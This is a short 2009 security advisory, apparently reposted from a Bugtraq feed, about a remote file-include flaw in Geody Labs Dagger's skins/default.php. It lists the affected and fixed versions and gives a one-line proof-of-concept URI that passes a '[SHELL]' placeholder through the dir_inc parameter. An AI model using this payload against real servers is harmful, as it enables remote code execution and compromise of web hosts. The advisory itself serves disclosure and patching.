|
Feeds -
Exploits
|
|
Written by CraCkEr
|
|
Monday, 16 March 2009 21:15 |
Dagger 'skins/default.php' Remote File Include Vulnerability
-\\Bugtraq ID:
29906
-\\Class:
Input Validation Error
-\\CVE:
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Jun 23 2008 12:00AM
-\\Updated:
Mar 16 2009 04:06PM
-\\Credit:
CraCkEr
-\\Vulnerable:
Geody Labs Dagger dagger_r12feb2008
-\\Not Vulnerable:
Geody Labs Dagger dagger_r13mar2009
-\\Discussion
Dagger is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying computer; other attacks are also possible.
-\\Exploit(s)/PoC(s):
An attacker can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/path/skins/default.php?dir_inc=[SHELL]
-\\Solution
Vendor updates are available. Please contact the vendor for details.
Geody Labs Dagger dagger_r12feb2008
--Geody Labs dagger_r13mar2009.zip
http://downloads.sourceforge.net/dagger/dagger_r13mar2009.zihttp://downloads.sourceforge.net/dagger/dagger_r13mar2009.zip
-\\Reference(s)
--Dagger Homepage
http://sourceforge.net/project/showfiles.php?group_id=7997 (Geody Labs)
|
